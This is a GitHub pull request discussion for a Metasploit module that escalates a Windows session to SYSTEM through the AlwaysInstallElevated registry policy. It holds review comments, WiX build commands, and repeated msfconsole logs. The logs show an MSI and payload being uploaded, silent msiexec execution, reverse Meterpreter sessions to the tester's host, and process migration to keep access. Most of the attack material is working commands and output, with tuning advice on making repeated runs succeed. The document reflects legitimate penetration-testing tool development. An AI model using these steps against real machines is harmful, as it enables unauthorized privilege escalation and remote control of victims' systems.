-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Windows Local Exploit AlwaysInstallElevated Registry Key #1099
Conversation
(NT AUTHORITY\SYSTEM). | ||
|
||
The default MSI file is data/exploits/exec_payload.msi with the WiX source | ||
file under external/source/exploits/exec_payload_msi/exec_payload.wxs. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The WiX source is in external/source/exploits/exec_payload_msi/exec_payload.wxs if I'm right.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I fixed the description - probably after you started looking at the file though.
msf exploit(always_install_elevated) > rexploit [] Started reverse handler on 192.168.1.25:7777 meterpreter > getuid |
No success launching the exploit again. The description says: The MSI may not execute succesfully successive times. Any clue about how to make the exploit work again? |
It best to regenerate the MSI as windows thinks that it has already been installed and will do things like try and find the original MSI file or tell the user this product has already been installed. You'll also want to kill msiexec as it may give you an error saying an installation is already in progress. 'MSI (s) (18:08) [10:46:54:188]: Product: Foobar 1.0 -- Error 1316. A network error occurred while attempting to read from the file: C:\DOCUME May benefit from set LOG_FILE so you can see some feedback. I'm going to stop generating a random name on the MSI file - the installer keeps looking for the first MSI file installed (which we've deleted), but appears to be happy to reinstall if we keep the same filename - this method is never going to be stealthy anyway... |
Hy Meatballs1, thanks very much! Looks much better for me. Still there is something I would like to point. Even when exiting meterpreter the payload.exe process will remain for a while, which makes successive exploits attempts unsuccessful until payload.exe finishes. I think the exploit looks a little better by adding the next 'InitialAutoRunScript' to 'DefaultOptions': 'DefaultOptions' => { 'WfsDelay' => 10, 'EXITFUNC' => 'thread', 'InitialAutoRunScript' => 'migrate -k -f' }, after that it can be launched successive times without wait :) : msf exploit(handler) > use exploit/windows/local/always_install_elevated msf exploit(always_install_elevated) > set session 1 session => 1 msf exploit(always_install_elevated) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.129:4444 [+] HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1. [+] HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1. [*] Uploading the MSI to C:\DOCUME~1\juan\LOCALS~1\Temp\exec_payload.msi ... [*] Uploading the Payload to C:\DOCUME~1\juan\LOCALS~1\Temp\payload.exe ... [*] Executing MSI... [*] Sending stage (752128 bytes) to 192.168.1.147 [*] Meterpreter session 2 opened (192.168.1.129:4444 -> 192.168.1.147:1040) at 2012-11-28 16:34:41 +0100 [*] Deleting MSI... [*] Deleting Payload... [-] stdapi_fs_delete_file: Operation failed: Access is denied. [-] Failed to delete payload C:\DOCUME~1\juan\LOCALS~1\Temp\payload.exe, this is expected if the exploit is successful, manual cleanup may be required. meterpreter > [*] Session ID 2 (192.168.1.129:4444 -> 192.168.1.147:1040) processing InitialAutoRunScript 'migrate -k -f' [*] Current server process: payload.exe (3532) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3792 [+] Successfully migrated to process [*] Killing original process with PID 3532 [+] Successfully killed process with PID 3532 meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.1.147 - Meterpreter session 2 closed. Reason: User exit msf exploit(always_install_elevated) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.129:4444 [+] HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1. [+] HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1. [*] Uploading the MSI to C:\DOCUME~1\juan\LOCALS~1\Temp\exec_payload.msi ... [*] Uploading the Payload to C:\DOCUME~1\juan\LOCALS~1\Temp\payload.exe ... [*] Executing MSI... [*] Sending stage (752128 bytes) to 192.168.1.147 [*] Meterpreter session 3 opened (192.168.1.129:4444 -> 192.168.1.147:1041) at 2012-11-28 16:34:57 +0100 [*] Deleting MSI... [*] Deleting Payload... [-] stdapi_fs_delete_file: Operation failed: Access is denied. [-] Failed to delete payload C:\DOCUME~1\juan\LOCALS~1\Temp\payload.exe, this is expected if the exploit is successful, manual cleanup may be required. meterpreter > [*] Session ID 3 (192.168.1.129:4444 -> 192.168.1.147:1041) processing InitialAutoRunScript 'migrate -k -f' [*] Current server process: payload.exe (172) [*] Spawning notepad.exe process to migrate to [+] Migrating to 1696 meterpreter > getuid [+] Successfully migrated to process [*] Killing original process with PID 172 [+] Successfully killed process with PID 172 ^C[-] Error running command getuid: Interrupt meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > Anyway, even when it looks good for me I would like that @jlee-r7 gives a last look to it, and agrees with merging. Once he agrees, I'll do last cleanup :) Really thanks for your collaboration! |
Yep looks good to me, thanks for all the feedback and testing! |
Okey, did last test after a little of cleanup, is working: msf exploit(handler) > use exploit/windows/local/always_install_elevated msf exploit(always_install_elevated) > set SESSION 1 SESSION => 1 msf exploit(always_install_elevated) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.129:4444 [+] HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1. [+] HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1. [*] Uploading the MSI to C:\DOCUME~1\juan\LOCALS~1\Temp\exec_payload.msi ... [*] Uploading the Payload to C:\DOCUME~1\juan\LOCALS~1\Temp\payload.exe ... [*] Executing MSI... [*] Sending stage (752128 bytes) to 192.168.1.147 [*] Meterpreter session 2 opened (192.168.1.129:4444 -> 192.168.1.147:1046) at 2012-11-28 21:47:14 +0100 [*] Deleting MSI... [*] Deleting Payload... [-] stdapi_fs_delete_file: Operation failed: Access is denied. [-] Failed to delete payload C:\DOCUME~1\juan\LOCALS~1\Temp\payload.exe, this is expected if the exploit is successful, manual cleanup may be required. meterpreter > [*] Session ID 2 (192.168.1.129:4444 -> 192.168.1.147:1046) processing InitialAutoRunScript 'migrate -k -f' [*] Current server process: payload.exe (3228) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3320 meterpreter > [+] Successfully migrated to process [*] Killing original process with PID 3228 [+] Successfully killed process with PID 3228 meterpreter > getpid Current pid: 3320 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : JUAN-C0DE875735 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > so merging! Really thanks @Meatballs1 for your contribution! |
@jvazquez-r7 will you generate an msi to be distributed with Metasploit or will users have to generate their own? |
@Meatballs1 a msi has been generated for being distributed with Metasploit |
This module checks that the AlwaysInstallElevated registry key is set for the local machine and the current user. If so it uploads and executes an MSI file and payload.exe. The MSI runs under the privileges of SYSTEM and will execute payload.exe when run.
Whilst it would have been nice to create this as a Local exploit writing a library to create MSI files was a bit too much effort!
The MSI can be created using the WIX tool (http://wix.sourceforge.net) simply with
'candle exec_payload.wxs'
'light exec_payload.wixobj'
msf exploit(always_install_elevated) > check
[+] HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1.
[+] HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1.
[+] The target is vulnerable.
msf exploit(always_install_elevated) > exploit
[] Started reverse handler on 192.168.1.25:5555
[+] HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1.
[+] HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1.
[] Uploading the MSI to C:\DOCUME
1\norm\LOCALS1\Temp\DTNMEUGg.msi ...[] Uploading the Payload to C:\DOCUME
1\norm\LOCALS1\Temp\payload.exe ...[] Executing MSI...
[] msiexec.exe /quiet /passive /n /package C:\DOCUME
1\norm\LOCALS1\Temp\DTNMEUGg.msi[] Sending stage (752128 bytes) to 192.168.1.25
[] Meterpreter session 3 opened (192.168.1.25:5555 -> 192.168.1.25:1395) at 2012-11-22 10:37:45 +0000
[] Deleting MSI...
[*] Deleting Payload...
[-] stdapi_fs_delete_file: Operation failed: Access is denied.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >